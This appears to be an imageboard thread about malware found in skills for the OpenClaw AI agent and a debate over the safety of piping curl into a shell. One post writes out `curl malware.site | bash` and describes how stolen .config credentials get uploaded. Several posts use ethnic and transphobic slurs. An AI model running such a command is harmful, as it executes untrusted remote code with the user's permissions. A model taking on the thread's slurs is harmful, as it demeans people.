openclaw isn't a real thing people use it's a grift made by some guy promoted on hackernews so he could get hired by openai to make more slop
based, hopefully it rooted their gpu kernels too
Is openclaw like your personal AI Assistant AGI?
OpenClaw literally means you hire a random guy touch your computer, without limit it's permission is dangerous
>>108192713All AI code has this issue and it's only out in the open now because it's open source by Peter Steinberger.This is a good thing, now people know there's malware out there in the skills.It's the same with Claude, deepseek, Gemini, chargpt
>>108192713anyone using those tools doesn’t give a single fuck about opsec. They might not even know what the word means
>>108192844Thank you ramdeep, very insightful
I hate whoever normalized curl | sh
curl | sh
>>108193938The amount of times I've seen this on otherwise professional projects is infuriating.
>>108193938How would it differ from package.linux.exe instead? You're running untrusted code either way.
>>108193938>>108194027it's convenientwhat software you decide to use is much more important than how you download itfor curl to fuck up, an attacker needs to deeply compromise the serverif it's a reputable program, then:1. the odds an attacker can serve a malicious script are low2. the odds you happen to download the script at that moment are low3. the odds you would find out later are highdownloading zed through curl is about as risky as downloading the nightly neovim build
>>108193938You will install rust and you will be safe
>>108192713must suck not having a brain huh AI jeets?
>>108194034You could in theory run a virus scan on a file before running it. Web servers can detect what is pulling a script from them return malware when curled or return safe code when downloaded via a browser.If the system is running selinux in enforcing mode session/ credential stealers wouldn't be able to access the internet to upload data, and may not be able to read them in the first place if the default policy blocks reading .config files.When you `curl malware.site | bash` you run the code directly with your permissions which would have permission to access all of your .config files and internet
>>108194074The issue is piping it into your shell without reviewing the script, which no one ever instructs the user to do. This is bad practice and no one should ever do it
>>108194437How is this any different to downloading a .exe on Windows?
>>108194551Scripts are auditable. If it's built from source then you can audit that too, otherwise you can verify the elf is being pulled from the right sourceWho knows what your winjeet .exe is doing. Winjeet tranny
Hahaha, we did say this exact thing would happen .
>>108194551that's exactly the issue, downloading an .exe on windows was never safe either
>>108192713>"What Would Elon Do">it just tricks you to steal your buttcoinsI wouldn't even call it false advertising.
>>108192713Wow I sure am glad I'm not one of those retards
>>108194551Downloading and running a random .exe is something only retarded kids do, source: downloaded and ran linkin_park_meteora.mp3.exe when I was 13
>>108192713Thank God there were no casualties because nobody actually used that shit.
